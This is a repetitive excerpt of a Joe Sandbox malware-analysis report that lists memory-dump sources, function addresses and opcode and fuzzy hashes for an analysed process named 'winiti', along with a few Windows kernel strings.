                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                  • Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
                  • Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                  • Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986
                  Function 008BFBB8 Relevance: .0, Instructions: 6COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                  • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                  • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                  • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                  Function 008BFBE8 Relevance: .0, Instructions: 6COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                  • Instruction ID: 9452a8d0b0f104eb9e4922b1c8778681c83a3ee0f3d85b1ffb0a7dc5c1b1eaf2
                  • Opcode Fuzzy Hash: c324cfac0bc47b069c1788d5b946c83edf7c28d4d9dcf1ed0d5a02e7884c4d21
                  • Instruction Fuzzy Hash: 9AB01272100640C7E349A714DA0BB5B7210FB80F00F00893BE00781852DF389A2CD986
                  Function 008BFB50 Relevance: .0, Instructions: 6COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                  • Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
                  • Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
                  • Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
                  Function 008BFC90 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                  • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                  • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                  • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                  Function 008BFC30 Relevance: .0, Instructions: 6COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                  • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                  • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                  • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                  Function 008BFC48 Relevance: .0, Instructions: 6COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                  • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                  • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                  • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                  Function 008BFC60 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                  • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                  • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                  • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                  Function 008BFD8C Relevance: .0, Instructions: 6COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                  • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                  • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                  • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                  Function 008C1D80 Relevance: .0, Instructions: 6COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                  • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                  • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                  • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                  Function 008BFD5C Relevance: .0, Instructions: 6COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                  • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                  • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                  • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                  Function 008BFEA0 Relevance: .0, Instructions: 6COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                  • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                  • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                  • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                  Function 008BFED0 Relevance: .0, Instructions: 6COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                  • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                  • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                  • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                  Function 008BFE24 Relevance: .0, Instructions: 6COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                  • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                  • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                  • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                  Function 008BFFB4 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                  • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                  • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                  • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                  Function 008BFFFC Relevance: .0, Instructions: 6COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                  • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                  • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                  • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                  Function 008BFF34 Relevance: .0, Instructions: 6COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                  • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                  • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                  • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                  Function 008E8788 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  • WindowsExcludedProcs, xrefs: 008E87C1
                  • Kernel-MUI-Language-Allowed, xrefs: 008E8827
                  • Kernel-MUI-Language-SKU, xrefs: 008E89FC
                  • Kernel-MUI-Language-Disallowed, xrefs: 008E8914
                  • Kernel-MUI-Number-Allowed, xrefs: 008E87E6
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000A10000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_8a0000_winiti.jbxd
                  Similarity
                  • API ID: _wcspbrk
                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                  • API String ID: 402402107-258546922
                  • Opcode ID: e18aa1027c2942479923e49f39e2355ef77efa63e43858139714a15a15f3c447
                  • Instruction ID: 989a5ba387ad8747fc3b249e53e88b119af3be77e530e09ced25795112581c8e
                  • Opcode Fuzzy Hash: e18aa1027c2942479923e49f39e2355ef77efa63e43858139714a15a15f3c447
                  • Instruction Fuzzy Hash: 65F1D6B1D00249EFCB11EF99C981EEEBBB8FB09304F14446AE505E7261EB34DA45DB51
                  Function 0095822C Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 160COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000A.00000002.530456475.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true
                  • Associated: 0000000A.00000002.530456475.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 0000000A.00000002.530456475.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
